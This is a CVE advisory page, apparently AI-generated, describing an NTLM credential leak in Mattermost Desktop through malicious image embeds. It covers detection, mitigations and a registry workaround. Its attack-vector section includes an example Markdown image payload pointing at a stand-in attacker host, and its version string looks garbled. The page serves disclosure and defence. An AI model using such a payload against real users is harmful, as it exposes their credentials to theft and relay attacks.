Skip to main content
CVE Vulnerability Database

CVE-2026-6517: Mattermost Desktop Credential Leak Flaw

CVE-2026-6517 is an information disclosure vulnerability in Mattermost Desktop that allows attackers to intercept NTLM credentials via malicious image embeds. This article covers technical details, affected versions, and mitigations.

Published:

CVE-2026-6517 Overview

CVE-2026-6517 affects Mattermost Desktop App versions <=6.1 5.5.13.0. The application fails to restrict the allow list of domains to which NTLM (NT LAN Manager) credentials are forwarded. Any authenticated user on a Mattermost server that does not have the image proxy enabled can intercept other users' NTLM credentials. The attacker embeds an image that routes to an external web server they control, triggering automatic credential forwarding from victim clients. Mattermost tracks this issue as advisory MMSA-2026-00651. The weakness is categorized as [CWE-522] Insufficiently Protected Credentials.

Critical Impact

Authenticated users can harvest other users' NTLM credentials by embedding malicious images, enabling offline hash cracking or relay attacks against corporate identity systems.

Affected Products

  • Mattermost Desktop App versions <=6.1 5.5.13.0
  • Deployments without the Mattermost image proxy enabled
  • Windows endpoints where NTLM authentication is active

Discovery Timeline

  • 2026-06-15 - CVE-2026-6517 published to NVD
  • 2026-06-17 - Last updated in NVD database

Technical Details for CVE-2026-6517

Vulnerability Analysis

The Mattermost Desktop App renders inline image content embedded in messages. On Windows hosts, the underlying network stack automatically responds to NTLM authentication challenges when requesting resources from external servers. Without a strict allow list governing which destinations may receive NTLM credentials, the desktop client forwards the user's NTLMv2 hash to attacker-controlled hosts. An adversary on the same Mattermost server posts a message containing an image URL pointing to their server. When the victim's desktop client fetches that image, Windows performs the NTLM handshake and leaks the hash. The image proxy feature, when enabled, prevents this by retrieving images server-side, but many deployments leave it disabled.

Root Cause

The root cause is missing domain validation before NTLM credentials are released. The desktop application trusts any URL embedded in chat content and allows the operating system to attempt authenticated fetches against arbitrary destinations. This maps to [CWE-522] Insufficiently Protected Credentials.

Attack Vector

Exploitation requires only low-privileged access to a Mattermost server. The attacker posts a message containing a Markdown image reference such as ![pic](http://attacker.example/logo.png). When viewed by a desktop client, the request triggers NTLM authentication against the attacker host. Captured Net-NTLMv2 hashes can be cracked offline or relayed against internal services such as SMB or LDAP.

// No verified public exploit code is available.
// See the Mattermost security advisory MMSA-2026-00651 for technical details.

Detection Methods for CVE-2026-6517

Indicators of Compromise

  • Outbound HTTP or HTTPS requests from Mattermost.exe to untrusted external domains carrying Authorization: NTLM or Authorization: Negotiate headers.
  • Messages in Mattermost channels containing externally hosted images with unusual or one-off domains.
  • Authentication events on internal services showing NTLM relay attempts originating from desktop client IP addresses.

Detection Strategies

  • Inspect proxy and firewall logs for NTLM handshake traffic initiated by the Mattermost desktop process.
  • Hunt for image links in Mattermost message exports that resolve to non-corporate domains.
  • Correlate Windows Security event 4624 Logon Type 3 entries with desktop client activity to detect relay attempts.

Monitoring Recommendations

  • Enable network egress monitoring for the Mattermost desktop binary and alert on NTLM challenge responses leaving the perimeter.
  • Audit Mattermost server configuration to verify whether the image proxy is enabled across all deployments.
  • Monitor authentication telemetry for anomalous NTLM activity originating from workstations running the desktop client.

How to Mitigate CVE-2026-6517

Immediate Actions Required

  • Upgrade the Mattermost Desktop App to a release that postdates version 6.1 5.5.13.0 and includes the MMSA-2026-00651 fix.
  • Enable the Mattermost image proxy on all servers to ensure images are fetched server-side rather than by clients.
  • Block outbound NTLM authentication at the perimeter firewall to prevent credential leakage to internet hosts.

Patch Information

Mattermost has published remediation guidance under advisory MMSA-2026-00651. Refer to the Mattermost Security Updates page for fixed versions and release notes.

Workarounds

  • Enable ServiceSettings.ImageProxyType on the Mattermost server so that image content is proxied and client-side fetches to attacker domains do not occur.
  • Apply Windows Group Policy Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers set to Deny all or Audit all to suppress outbound NTLM authentication.
  • Restrict the Mattermost desktop process from reaching arbitrary external hosts using endpoint firewall rules until patching is complete.
bash
# Windows registry workaround to block outbound NTLM authentication
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" /v RestrictSendingNTLMTraffic /t REG_DWORD /d 2 /f

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.